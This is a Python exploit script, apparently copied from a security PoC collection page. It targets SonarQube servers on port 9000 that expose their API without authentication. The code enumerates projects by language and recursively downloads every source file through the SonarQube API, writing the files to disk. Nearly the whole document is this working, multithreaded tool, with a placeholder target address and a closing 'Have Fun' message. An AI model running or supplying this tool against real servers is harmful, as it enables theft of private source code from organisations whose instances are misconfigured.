menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Some-PoC-oR-ExP-master chevron_right Sonarqube chevron_right exploit.py
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    exploit.py
    5.4 KB / 2021-07-04 19:32:24
        #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    # User      : CF_HB
    # explain   : Sonarqube 9000端口,扫描引擎未授权访问的下载源码利用工具
    # Datetime  : 2021/3/14 23:25
    
    import html
    import json
    import os
    import queue
    import re
    import threading
    from urllib.parse import urlparse

    import requests
    #
    # Sonarqube 9000端口,扫描引擎未授权访问的下载源码利用工具
    #
    class Scanner(object):
        """Exploit helper for SonarQube instances (port 9000) whose web API is
        exposed without authentication: enumerates projects matching a language
        (and optional name) filter, then mirrors each project's source files to
        disk via the /api/sources/lines endpoint.
        """

        def __init__(self):
            self.url = ''            # base URL of the target, e.g. http://host:9000
            self.project_key = ''    # key of the project currently being walked
            self.project_name = ''   # local output root: <ip><sep><project name>
            self.thread_count = 1    # number of worker threads started by scan()
            # Language filter for the project search. Options seen in the SonarQube
            # UI: xml, java, jsp, js, web, kotlin, py, php, css, scala.
            self.languages = 'java'
            self.file_count = 0      # files downloaded successfully
            self.fail_count = 0      # files that failed to download
            self.check_key = ""      # optional project-name query filter ("" = all)
            self.components_Tree = []  # unused; kept for interface compatibility

        def get_projects(self):
            """Search the target for projects and download each one found.

            Returns None implicitly on success; returns (None, None) if any
            request or parse step fails (legacy contract, kept as-is).
            """
            # Derive the bare IP/host for the local output directory name.
            ipaddr = urlparse(self.url).netloc.split(":")[0]

            try:
                base_url = (self.url
                            + "/api/components/search_projects?ps=50"
                              "&f=analysisDate%2CleakPeriodDate&s=analysisDate&asc=false&")
                # URL-encoded: filter=languages = <lang> [and query = "<check_key>"]
                condiction_filter = "filter=languages%20%3D%20" + self.languages
                if self.check_key != "":
                    condiction_filter += "%20and%20query%20%3D%20%22{check_key}%22".format(
                        check_key=self.check_key)

                search_url = base_url + condiction_filter
                cookies = {"JSESSIONID": "2CA6E657AB011B76E0D5C02ED74D868B"}
                headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Accept": "application/json",
                           "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36",
                           "Referer": self.url + "/projects?sort=-analysis_date",
                           "Accept-Encoding": "gzip, deflate",
                           "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
                print(search_url)

                rsp = requests.get(search_url, headers=headers, cookies=cookies, verify=False)
                text_jsons = json.loads(rsp.content)
                total = text_jsons['paging']['total']
                print("FOUND %s Projects. in %s " % (total, self.url))

                for component in text_jsons['components']:
                    key = component['key']
                    self.project_key = key
                    self.project_name = ipaddr + os.sep + component['name']
                    self.download_component_tree(key)
            except Exception as e:
                print(e)
                return None, None

        def download_component_tree(self, project_key):
            """Recursively walk a project's component tree, creating directories
            and downloading every file component encountered."""
            tree_url = (self.url
                        + "/api/measures/component_tree?ps=100&s=qualifier%2Cname&component="
                        + project_key + "&metricKeys=code_smells&strategy=children")
            components_rsp = requests.get(tree_url, verify=False).content
            components_list = json.loads(components_rsp)['components']
            for component in components_list:
                component_key = component['key']
                component_path = component['path']
                # Heuristic: a path with no "." is treated as a directory and recursed
                # into; anything with a dot is assumed to be a file.
                if "." not in component_path:
                    dir_target = self.project_name + os.sep + component_path
                    if not os.path.exists(dir_target):
                        os.makedirs(dir_target)
                    self.download_component_tree(component_key)
                else:
                    try:
                        self.get_file_sources(component_key, component_path)
                        self.file_count += 1
                        print("downloading %s files success.." % str(self.file_count))
                    # FIX: was a bare "except:", which also swallowed KeyboardInterrupt.
                    except Exception:
                        self.fail_count += 1
                        print("downloading %s files fail.." % str(self.fail_count))

        def get_file_sources(self, component_key, component_path):
            """Download one file's source by key, e.g.
            http://host:9000/api/sources/lines?key=<key>&from=1&to=5002,
            strip the HTML markup SonarQube embeds in each line, and append the
            cleaned text to the mirrored file on disk."""
            url = self.url + "/api/sources/lines?key=" + component_key + "&from=1&to=5002"
            # FIX: original did '"downloading %s files " + str(...)' which printed a
            # literal "%s" instead of formatting the count.
            print("downloading %s files " % str(self.file_count))

            rsp = requests.get(url, verify=False)
            sources_lists = json.loads(rsp.content)['sources']
            tag_re = re.compile(r'<[^>]+>', re.S)

            # FIX: original joined with a doubled os.sep (project_name + sep + sep + path).
            with open(self.project_name + os.sep + component_path, mode='a+') as wf:
                for line in sources_lists:
                    cleaned = tag_re.sub('', line['code'])
                    # Syntax-highlighted lines arrive HTML-escaped; restore raw source.
                    wf.write(html.unescape(cleaned) + "\n")

        def scan(self):
            """Start thread_count workers running get_projects and wait for them."""
            workers = []
            for _ in range(self.thread_count):
                # FIX: original passed target=self.get_projects() — the call ran
                # synchronously in the main thread and the Thread got target=None.
                t = threading.Thread(target=self.get_projects)
                t.start()
                workers.append(t)
            for t in workers:
                t.join()
    
    
    if __name__ == '__main__':
        # Configure the scanner and run it against the target instance.
        scanner = Scanner()
        scanner.url = "http://000.111.222.333:9000"   # target SonarQube address
        scanner.check_key = ""  # optionally restrict to a specific project
        scanner.scan()
        print("Everything is Over, Have Fun~~~~")
    
    
    links
    file_download